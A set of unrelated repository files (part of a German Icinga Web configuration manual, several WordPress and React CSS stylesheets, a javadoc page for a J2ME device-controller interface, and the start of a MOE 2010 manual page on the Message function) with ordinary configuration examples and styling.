<p>Sie müssen eine Icinga-Web-Datenbank haben, die Informationen über Benutzer, Anmeldeinformationen, View-Persistenz, etc.
enthält. Diese Datenbank muss 'icinga_web' heißen. Alle Einstellungen sind im vorigen Abschnitt beschrieben.</p>
</li>
<li class="listitem">
<p><span class="emphasis"><em>Die "icinga"-Datenbank</em></span></p>
<p>Ab Icinga-Web v1.5 wird die Icinga-API über Doctrine angesprochen (vorher gab es ein eigenes Projekt, die 'icinga-api').
Im Folgenden werden nur spezielle bzw. zusätzliche Einstellungen erklärt. Solange nicht anders erwähnt, gelten alle Regeln aus
<a class="link" href="icinga-web-config.html#configweb-general">"Allgemeine Einstellungen"</a>.</p>
<div class="itemizedlist"><ul class="itemizedlist" type="square">
<li class="listitem">
<p>Datenbank-Identifier</p>
<p>Der Icinga-Datenbank-Identifier muss "IcingaDoctrineDatabase" als 'class'-Attribut und 'icinga' als Datenbankname
benutzen, also:</p>
<pre class="screen"><db:database name="icinga" class="IcingaDoctrineDatabase">
...
</db:database></pre>
</li>
<li class="listitem">
<p>dsn</p>
<p>Sie können die gleichen Anmeldeinformationen wie in der <code class="filename">ido2db.cfg</code> benutzen, aber als
Sicherheitsgründen ist es sehr ratsam, einen Benutzer nur mit Leserechten für Icinga-Web anzulegen. Nachfolgend ein
Beispiel, welche Werte aus der <code class="filename">ido2db.cfg</code> passen.</p>
<pre class="screen"> <ae:parameter name="dsn">mysql://db_user:db_pass@db_host:db_port/db_name</ae:parameter></pre>
</li>
<li class="listitem">
<p>prefix</p>
<p>Definiert den Präfix wie in <code class="filename">ido2db.cfg</code> angegeben</p>
<pre class="screen"><db:database name="icinga" class="IcingaDoctrineDatabase">
...
<ae:parameter name="prefix">icinga_</ae:parameter>
...
</db:database></pre>
<p>Für Oracle benutzen Sie einen leeren Wert</p>
<pre class="screen"><db:database name="icinga" class="IcingaDoctrineDatabase">
...
<ae:parameter name="prefix"></ae:parameter>
...
</db:database></pre>
</li>
<li class="listitem">
<p>use_retained</p>
<p>Whether to use retained or original data dumps (see the value in idomod.cfg)</p>
<pre class="screen"><db:database name="icinga" class="IcingaDoctrineDatabase">
...
<ae:parameter name="use_retained">true</ae:parameter>
</db:database></pre>
</li>
</ul></div>
</li>
<li class="listitem">
<p><span class="emphasis"><em>Komplettes Listing</em></span></p>
<pre class="screen"><?xml version="1.0" encoding="UTF-8"?>
<databases xmlns:db="http://agavi.org/agavi/config/parts/databases/1.0" xmlns:ae="http://agavi.org/agavi/config/global/envelope/1.0">
<db:database name="icinga_web" class="AppKitDoctrineDatabase">
<ae:parameter name="dsn">mysql://icinga_web:icinga_web@localhost:3306/icinga_web</ae:parameter>
<ae:parameter name="charset">utf8</ae:parameter>
<ae:parameter name="manager_attributes">
<ae:parameter name="Doctrine_Core::ATTR_MODEL_LOADING">CONSERVATIVE</ae:parameter>
</ae:parameter>
<ae:parameter name="load_models">%core.module_dir%/AppKit/lib/database/models/generated</ae:parameter>
<ae:parameter name="models_directory">%core.module_dir%/AppKit/lib/database/models</ae:parameter>
<ae:parameter name="date_format"><![CDATA[YYYY-MM-DD HH24:MI:SS]]></ae:parameter>
<ae:parameter name="caching">
<ae:parameter name="enabled">false</ae:parameter>
<ae:parameter name="driver">apc</ae:parameter>
<ae:parameter name="use_query_cache">true</ae:parameter>
<ae:parameter name="use_result_cache">true</ae:parameter>
<ae:parameter name="result_cache_lifespan">60</ae:parameter>
</ae:parameter>
</db:database>
<db:database xmlns="http://agavi.org/agavi/config/parts/databases/1.0" name="icinga" class="IcingaDoctrineDatabase">
<ae:parameter name="dsn">mysql://icinga:icinga@localhost:3306/icinga</ae:parameter>
<ae:parameter name="prefix">icinga_</ae:parameter>
<ae:parameter name="charset">utf8</ae:parameter>
<ae:parameter name="use_retained">true</ae:parameter>
<ae:parameter name="manager_attributes">
<ae:parameter name="Doctrine_Core::ATTR_MODEL_LOADING">CONSERVATIVE</ae:parameter>
</ae:parameter>
<ae:parameter name="load_models">%core.module_dir%/Api/lib/database/models/generated</ae:parameter>
<ae:parameter name="models_directory">%core.module_dir%/Api/lib/database/models</ae:parameter>
<ae:parameter name="caching">
<ae:parameter name="enabled">false</ae:parameter>
<ae:parameter name="driver">apc</ae:parameter>
<ae:parameter name="use_query_cache">true</ae:parameter>
</ae:parameter>
</db:database>
</databases></pre>
</li>
</ul></div>
</li>
<li class="listitem">
<p><a name="configweb-factories"></a><code class="filename">factories.xml</code> - Agavi Systemkonfiguration, Storage- und
Session-Konfiguration</p>
<p>holds the config for your web session, e.g. the session_cookie_lifetime-parameter</p>
<p><a name="configweb-session-lifetime"></a> <span class="bold"><strong>Session Cookie Lifetime</strong></span></p>
<p>Beispiel: Ändern von session_cookie_lifetime</p>
<p>Die Session Lifetime ist die Zeit in Sekunden, bis die Icinga Web-Session abläuft. Sie kann auf globaler Ebene in der Datei
<code class="filename">app/config/factories.xml</code> konfiguriert werden.</p>
<pre class="programlisting"><ae:parameter name="session_cookie_lifetime">3600<ae:parameter></pre>
<p>Wenn Sie die session_cookie_lifetime ändern möchten, editieren Sie bitte
<code class="filename">app/config/factories.site.xml</code></p>
</li>
<li class="listitem">
<p><a name="configweb-logging"></a><code class="filename">logging.xml</code> - deaktivieren von Log-Ebenen oder schreiben von neuen Log-Dateien</p>
</li>
<li class="listitem">
<p><a name="configweb-settings"></a><code class="filename">settings.xml</code> - Icinga-Einstellungen, z.B. Version und Präfixe /
Versionsname</p>
<p>enthält auch <code class="filename">icinga.xml</code> (enthält die Konfiguration für Ihr Icinga Web ROOT-Verzeichnis und den Icinga-Web
Pfad)</p>
</li>
<li class="listitem">
<p><a name="configweb-translation"></a><code class="filename">translation.xml</code> - Default-Sprache, Datum- und Zeitformate und
Einstellungen</p>
<p>Falls Ihre Zeitzone von GMT abweicht, dann müssen Sie ggf. die entsprechenden Einstellungen in <code class="filename">php.ini</code>
(oder in <code class="filename">translation.xml</code>, falls Sie dort nicht ändern können). Anderenfalls erhalten Sie möglicherweise eine
Fehlermeldung ähnlich der folgenden:</p>
<div class="figure">
<a name="idm139734667428688"></a><p class="title"><b>Abbildung 6.1. Icinga Web instance down</b></p>
<div class="figure-contents">
<div class="mediaobject"><img src="../images/icinga-web-instance-down.png" alt="Icinga Web instance down"></div>
</div>
</div>
<br class="figure-break">
<p>Setzen Sie die Direktive auf einen gültigen Wert (z.B. 'Europe/Berlin').</p>
</li>
<li class="listitem">
<p><a name="configweb-views"></a><code class="filename">views.xml</code> - erlaubt dem Benutzer das Hinzufügen/Ändern von
API-Ansichten.</p>
</li>
</ul></div>
</div>
<div class="section" title="6.6.4. Fehlersuche">
<div class="titlepage"><div><div><h3 class="title">
<a name="troubleshooting"></a>6.6.4. Fehlersuche</h3></div></div></div>
<div class="itemizedlist"><ul class="itemizedlist" type="disc"><li class="listitem">
<p>Ich kann keine Befehle senden/ausführen!</p>
<p>Stellen Sie sicher, dass der WebServer-Benutzer Schreibberechtigung auf die Icinga-Pipe besitzt und dass das
"icinga_pipe"-Symbol im "readwrite"- oder "write"-Abschnitt Ihres Host (oder im default-Abschnitt) vorhanden ist. Stellen Sie
sicher, dass der Pfad korrekt ist.</p>
</li></ul></div>
<p><a name="configweb-timezone"></a> <span class="bold"><strong>Icinga Web-Zeitzone</strong></span></p>
<p>Wenn die Zeitzone von Icinga Web von Ihrer lokalen Zeitzone abweicht, überprüfen Sie bitte den Parameter "date.timezone" in Ihrer
<code class="filename">php.ini</code>. Alternativ überprüfen Sie den Eintrag in <code class="filename">app/modules/AppKit/config/module.xml</code> (z.B.
'Europe/Berlin')</p>
<pre class="programlisting">#> vi app/modules/AppKit/config/module.xml
<ae:parameter name="date.timezone">Europe/Berlin</ae:parameter></pre>
<p><a name="configweb-userprefs"></a> <span class="bold"><strong>Benutzervorgaben ändern</strong></span></p>
<p>Die Datei <code class="filename">module.xml</code> enthält verschiedene Einstellungen, die durch eigene Werte überschrieben werden können,
die in der Datei <code class="filename">userpreferences.xml</code> (im Ordner <code class="filename">etc/config</code> einzutragen sind).</p>
</div>
<div class="section" title="6.6.5. Modul-Konfiguration:">
<div class="titlepage"><div><div><h3 class="title">
<a name="moduleconfig"></a>6.6.5. <a name="configweb-module"></a>Modul-Konfiguration:</h3></div></div></div>
<div class="itemizedlist"><ul class="itemizedlist" type="disc">
<li class="listitem">
<p><span class="bold"><strong>app/modules/AppKit</strong></span></p>
<p>Hier "lebt" das Framework: Authentifikation, Menüs und weiteres.</p>
<p><a name="configweb-auth"></a> <span class="bold"><strong>Authentifizierung</strong></span></p>
<p>Beispiel: LDAP-Authentifizierung</p>
<p>Öffnen Sie <code class="filename">app/modules/AppKit/config/auth.xml</code>.</p>
<p>Ein Anbieter ist wie folgt aufgebaut:</p>
<pre class="programlisting"> <ae:parameter name="msad-ldap1">
<ae:parameter name="auth_module">AppKit</ae:parameter>
<ae:parameter name="auth_provider">Auth.Provider.LDAP</ae:parameter>
<ae:parameter name="auth_enable">true</ae:parameter>
<ae:parameter name="auth_authoritative">true</ae:parameter>
<ae:parameter name="auth_create">true</ae:parameter>
<ae:parameter name="auth_update">true</ae:parameter>
<ae:parameter name="auth_map">
<ae:parameter name="user_firstname">givenName</ae:parameter>
<ae:parameter name="user_lastname">sn</ae:parameter>
<ae:parameter name="user_email">mail</ae:parameter>
</ae:parameter>
<ae:parameter name="ldap_dsn">ldap://ad.icinga.org</ae:parameter>
<ae:parameter name="ldap_basedn">DC=ad,DC=icinga,DC=org</ae:parameter>
<ae:parameter name="ldap_binddn">ldap@AD.ICINGA.ORG</ae:parameter>
<ae:parameter name="ldap_bindpw"><![CDATA[XXXXXXXXX]]></ae:parameter>
<ae:parameter name="ldap_userattr">uid</ae:parameter>
<ae:parameter name="ldap_filter_user"><![CDATA[(&(sAmAccountName=__USERNAME__))]]></ae:parameter>
</ae:parameter></pre>
<p>Die <code class="filename">auth.xml</code> hält die Dokumentation für die globale Konfiguration. Die LDAP-Authentifizierung sollte mit
einigen grundlegenden LDAP-Kenntnissen möglich sein.</p>
<p>Sie können die Anbieter duplizieren und so Ihre Authentifizierungs-Basis vergrößern.</p>
<p>Bitte speichern Sie Ihre Konfiguration in <code class="filename">auth.site.xml</code>!</p>
</li>
<li class="listitem">
<p><span class="bold"><strong>app/modules/Cronks</strong></span></p>
<p>Alle Cronks werden hier implementiert: Grids und iframes. Sie sind einfache HTML-Seiten, die ExtJS-Komponenten-Code enthalten.
Wenn Sie einen neuen Cronk hinzufügen möchten, wird dieses Modul Ihr Freund sein.</p>
<p>Wenn Sie einen neuen Cronk entwickeln möchten, schauen Sie hier: <a class="link" href="https://dev.icinga.org/projects/icinga-development/wiki/HowToDevelopCronks" target="_top">HowToDevelopCronks</a></p>
<p>Die Konfiguration können Sie im Cronk-Module ändern:</p>
<pre class="programlisting">#> ls app/modules/Cronks/config
autoload.xml config_handlers.xml cronks.xml module.xml validators.xml</pre>
<div class="itemizedlist"><ul class="itemizedlist" type="circle">
<li class="listitem">
<p><code class="filename">module.xml</code> - definieren von neuen Kategorien in denen die Cronks erscheinen, die Datei
<code class="filename">module.xml</code> hält dazu alle Informationen</p>
</li>
<li class="listitem">
<p><code class="filename">cronks.xml</code> - um auf neue Cronks zu zugreifen, definieren von neuen iframe Cronks</p>
</li>
</ul></div>
</li>
<li class="listitem">
<p><span class="bold"><strong>app/modules/Web</strong></span></p>
<p>Oder besser:<span class="bold"><strong> Icinga</strong></span>. Dieses Modul enthält alle Icinga relevanten Dinge wie IcingaAPI2Json und
die Statusinformationen.</p>
</li>
</ul></div>
</div>
<div class="section" title="6.6.6. Benutzerdefinierte Konfiguration">
<div class="titlepage"><div><div><h3 class="title">
<a name="customconfig"></a>6.6.6. Benutzerdefinierte Konfiguration</h3></div></div></div>
<p><span class="bold"><strong>Bitte beachten:</strong></span></p>
<p>Wenn Sie Konfigurationsdateien ändern oder erstellen, denken Sie bitte an folgendes:</p>
<div class="itemizedlist"><ul class="itemizedlist" type="disc">
<li class="listitem">
<p>Zeilen die mit <!-- beginnen und enden mit --> werden als Kommentare interpretiert.</p>
</li>
<li class="listitem">
<p>Variablennamen sind case-sensitive</p>
</li>
</ul></div>
<div class="note" title="Anmerkung" style="margin-left: 0.5in; margin-right: 0.5in;"><table border="0" summary="Note">
<tr>
<td rowspan="2" align="center" valign="top" width="25"><img alt="[Anmerkung]" src="../images/note.png"></td>
<th align="left">Anmerkung</th>
</tr>
<tr><td align="left" valign="top">
<p>Nach dem Ändern von Konfigurationsdateien leeren Sie bitte den Cache!</p>
</td></tr>
</table></div>
<pre class="programlisting"> #> rm -rf app/cache/config/*.php</pre>
<p>oder</p>
<pre class="programlisting"> #> /usr/local/icinga-web/bin/clearcache.sh</pre>
<p>Benötigen Sie weitere Informationen? Schauen Sie bitte in unserem<a class="link" href="https://dev.icinga.org/projects/icinga-development/wiki/" target="_top"> Development Wiki.</a></p>
<a class="indexterm" name="idm139734667383856"></a>
<a class="indexterm" name="idm139734667385168"></a>
<a class="indexterm" name="idm139734667381616"></a>
<a class="indexterm" name="idm139734667380384"></a>
<a class="indexterm" name="idm139734667379136"></a>
<a class="indexterm" name="idm139734667377408"></a>
</div>
</div>
<div class="navfooter">
<hr>
<table width="100%" summary="Navigation footer">
<tr>
<td width="40%" align="left">
<a accesskey="p" href="icinga-web-scratch.html">Zurück</a> </td>
<td width="20%" align="center"><a accesskey="u" href="ch06.html">Nach oben</a></td>
<td width="40%" align="right"> <a accesskey="n" href="upgrading_icingaweb.html">Weiter</a>
</td>
</tr>
<tr>
<td width="40%" align="left" valign="top">6.5. Installation des Icinga Web Frontend </td>
<td width="20%" align="center"><a accesskey="h" href="index.html">Zum Anfang</a></td>
<td width="40%" align="right" valign="top"> 6.7. Aktualisierung von Icinga Web und Icinga Web Datenbank</td>
</tr>
</table>
</div>
<P class="copyright">© 1999-2009 Ethan Galstad, 2009-2017 Icinga Development Team, https://www.icinga.com</P>
</body>
</html>
|
layouts/content-sidebar.css
|
ExplorerT/LAVA
|
/*
* Theme Name: LAVA
*
* Layout: Content-Sidebar
*
* Learn more: https://developer.wordpress.org/themes/basics/template-files/
*/
.content-area {
float: left;
margin: 0 -25% 0 0;
width: 100%;
}
.site-main {
margin: 0 25% 0 0;
}
.site-content .widget-area {
float: right;
overflow: hidden;
width: 25%;
}
.site-footer {
clear: both;
width: 100%;
}
|
lib/doc/com/mxme/common/IDeviceController.html
|
matias-pequeno/ikea-calc-j2me-java
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_10) on Fri Feb 20 23:13:27 ARST 2009 -->
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<TITLE>
IDeviceController
</TITLE>
<META NAME="date" CONTENT="2009-02-20">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="IDeviceController";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/IDeviceController.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../com/mxme/common/EventQueue.html" title="class in com.mxme.common"><B>PREV CLASS</B></A>
<A HREF="../../../com/mxme/common/IPainter.html" title="interface in com.mxme.common"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?com/mxme/common/IDeviceController.html" target="_top"><B>FRAMES</B></A>
<A HREF="IDeviceController.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
com.mxme.common</FONT>
<BR>
Interface IDeviceController</H2>
<DL>
<DT><B>All Known Implementing Classes:</B> <DD><A HREF="../../../com/mxme/common/midp20/DeviceController.html" title="class in com.mxme.common.midp20">DeviceController</A></DD>
</DL>
<HR>
<DL>
<DT><PRE>public interface <B>IDeviceController</B></DL>
</PRE>
<P>
<HR>
<P>
<!-- ========== METHOD SUMMARY =========== -->
<A NAME="method_summary"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="2"><FONT SIZE="+2">
<B>Method Summary</B></FONT></TH>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> boolean</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../com/mxme/common/IDeviceController.html#isVibrationSupported()">isVibrationSupported</A></B>()</CODE>
<BR>
Checks whether vibration is supported or not</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../com/mxme/common/IDeviceController.html#setGame(javax.microedition.midlet.MIDlet)">setGame</A></B>(javax.microedition.midlet.MIDlet game)</CODE>
<BR>
Sets a game to control</TD>
</TR>
<TR BGCOLOR="white" CLASS="TableRowColor">
<TD ALIGN="right" VALIGN="top" WIDTH="1%"><FONT SIZE="-1">
<CODE> void</CODE></FONT></TD>
<TD><CODE><B><A HREF="../../../com/mxme/common/IDeviceController.html#vibrate(int)">vibrate</A></B>(int duration)</CODE>
<BR>
Makes the phone vibrate for the specified time</TD>
</TR>
</TABLE>
<P>
<!-- ============ METHOD DETAIL ========== -->
<A NAME="method_detail"><!-- --></A>
<TABLE BORDER="1" WIDTH="100%" CELLPADDING="3" CELLSPACING="0" SUMMARY="">
<TR BGCOLOR="#CCCCFF" CLASS="TableHeadingColor">
<TH ALIGN="left" COLSPAN="1"><FONT SIZE="+2">
<B>Method Detail</B></FONT></TH>
</TR>
</TABLE>
<A NAME="isVibrationSupported()"><!-- --></A><H3>
isVibrationSupported</H3>
<PRE>
boolean <B>isVibrationSupported</B>()</PRE>
<DL>
<DD>Checks whether vibration is supported or not
<P>
<DD><DL>
<DT><B>Returns:</B><DD></DL>
</DD>
</DL>
<HR>
<A NAME="vibrate(int)"><!-- --></A><H3>
vibrate</H3>
<PRE>
void <B>vibrate</B>(int duration)</PRE>
<DL>
<DD>Makes the phone vibrate for the specified time
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>duration</CODE> - Time</DL>
</DD>
</DL>
<HR>
<A NAME="setGame(javax.microedition.midlet.MIDlet)"><!-- --></A><H3>
setGame</H3>
<PRE>
void <B>setGame</B>(javax.microedition.midlet.MIDlet game)</PRE>
<DL>
<DD>Sets a game to control
<P>
<DD><DL>
<DT><B>Parameters:</B><DD><CODE>game</CODE> - Game to control</DL>
</DD>
</DL>
<!-- ========= END OF CLASS DATA ========= -->
<HR>
<!-- ======= START OF BOTTOM NAVBAR ====== -->
<A NAME="navbar_bottom"><!-- --></A>
<A HREF="#skip-navbar_bottom" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_bottom_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/IDeviceController.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../index-files/index-1.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../com/mxme/common/EventQueue.html" title="class in com.mxme.common"><B>PREV CLASS</B></A>
<A HREF="../../../com/mxme/common/IPainter.html" title="interface in com.mxme.common"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../index.html?com/mxme/common/IDeviceController.html" target="_top"><B>FRAMES</B></A>
<A HREF="IDeviceController.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: NESTED | FIELD | CONSTR | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: FIELD | CONSTR | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_bottom"></A>
<!-- ======== END OF BOTTOM NAVBAR ======= -->
<HR>
</BODY>
</HTML>
|
wp-content/plugins/yikes-inc-easy-mailchimp-extender/templates/yikes-mailchimp-bundled-templates/Header_Optin_-_City_Skyline/header_optin_template_city_skyline.css
|
Scalechange/scalesite
|
/*
Template: Header Optin Variant 2 - City Skyline ( Bundled Template #4 )
Description : This is the .css file associated with the above template. This file gets loaded when using the above
template to display a custom opt-in form for YIKES Inc. Easy MailChimp Extender.
Author : YIKES Inc.
Author Contact : http://www.yikesinc.com
*/
/* Container **/
.large-optin-template {
background: url("./images/city_skyline.jpg");
background-size: cover;
}
.large-optin-template {
display: inline-block;
width: 100%;
}
/** Font Declerations **/
.large-optin-template h4 {
font-size: 20px;
margin: 0;
color: rgba(248, 248, 248, 0.90);
text-align: center;
}
.large-optin-template h3 {
text-align:center;
margin: 0;
font-size: 30px;
color: #FECB00;
}
.large-optin-template p {
font-size: 17px;
margin: auto;
color: #8DB8C0;
}
.large-optin-template p.disclaimer {
font-size: 14px;
}
/** Submit Button **/
.ykfmc-submit {
border:none !important;
display:block;
margin:0 auto;
}
/** Error + Confirmation Messages **/
#yks_form_error_message {
color: #fefefe;
margin-bottom: 0;
}
.large-optin-template #wrapper {
display: table;
max-width: 30%;
min-width: 225px;
margin-left: 15%;
background: rgba(60, 58, 58, 0.66);
border-radius: 5px;
margin-top: 5.5em;
margin-bottom: 5.5em;
padding: 1em;
}
/* Right Container */
.large-optin-template #box {
float: center;
max-width: 100%;
}
/** When the wrapper is within the content, let's center #wrapper element **/
.entry-content .large-optin-template #wrapper {
max-width: 75%;
display:block;
margin: 0 auto;
margin-top: 2em;
margin-bottom: 2.5em;
}
/** Break Point **/
/* When the screen is 800px or smaller, we'll center the #wrapper element **/
@media only screen and (max-width: 800px) {
.large-optin-template #wrapper {
max-width: 75%;
display:block;
margin: 0 auto;
margin-top: 2em;
margin-bottom: 2.5em;
}
}
|
wp-content/plugins/badr-naver-syndication/css/style.css
|
sleeping-lion/dojisa
|
.wrap { font-family: dotum, '돋움';}
.wrap h3 {font-family: gulim, '굴림체'; font-size: 16px; font-weight:800}
.postbox .inside {padding-bottom:0; margin-bottom:0 !important}
.form-table th span {font-weight: 700; padding-left: 10px}
.form-table .even { background-color : #f6f6f6;}
.form-table td p, .form-table label {font-size: 13px;line-height: 1.5; margin: 0.5em 0;}
.inside .message {background-color:#f6f6f6; padding:3px; font-weight: 800}
.inside p.message {padding:10px 15px;}
.inside p.syndication_ajax { padding: 0 5px 10px 0 }
#configCheckResult {border-color:#CEE1EF; border-style:solid; border-width:2px; height:10em; margin:5px 0px 5px 0px; overflow:auto; padding:0.5em 0.5em; background-color:#fff; display:none;}
#configCheckResult br{ line-height: 1.2; margin:0;}
/* wp-list-table */
.column-date { width: 150px}
/* post box */
.postbox { margin:0 10px 10px 0;}
.postbox#usefullink {border: 2px;}
|
src/style/App.css
|
okristian1/react-info
|
.App-logo {
animation: App-logo-spin infinite 20s linear;
height: 80px;
}
.App-header {
background-color: #222;
height: 150px;
padding: 20px;
color: white;
}
@keyframes App-logo-spin {
from { transform: rotate(0deg); }
to { transform: rotate(360deg); }
}
|
_draft/MOE/moe2010/html/moe/fcnref/message.html
|
platinhom/ManualHom
|
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<!--
!! MOE 2010.10 On-Line Manuals
!! COPYRIGHT (C) 2010
!! CHEMICAL COMPUTING GROUP INC. ALL RIGHTS RESERVED.
!!-->
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
<link rel="stylesheet" type="text/css"
href="../../manstyle.css" />
<meta keywords>
<meta functions Message>
<title>Miscellaneous Functions: Message</title>
</head>
<body bgcolor="#ffffff">
<a href="../../index.htm"><img src="../../images/logo.gif"
alt="CCG Logo" align="right" width="174" height="55" border="0" /></a>
<h4>MOE 2010.10</h4>
<h2>Miscellaneous Functions</h2>
<hr noshade="noshade" />
<h2>Syntax</h2>
<pre>
msg_key = <a class="fcnlink" href="#Message">Message</a> [msg_key, 'message']
</pre>
<p><a name="Message"></a></p>
<h2>Description</h2>
<p>Handles the creation, modification and deletion of
messages that are displayed in the MOE Window.
The behavior of the function is summarized as follows:</p>
<center>
<table border="1" cellpadding="5" cellspacing=0>
<tr>
<td> </td>
<td><tt>'message' == []</tt></td>
<td><tt>'message' <> []</tt></td>
</tr>
<tr>
<td><tt>msg_key == 0</tt></td>
<td>Does nothing</td>
<td>Creates new message</td>
</tr>
<tr>
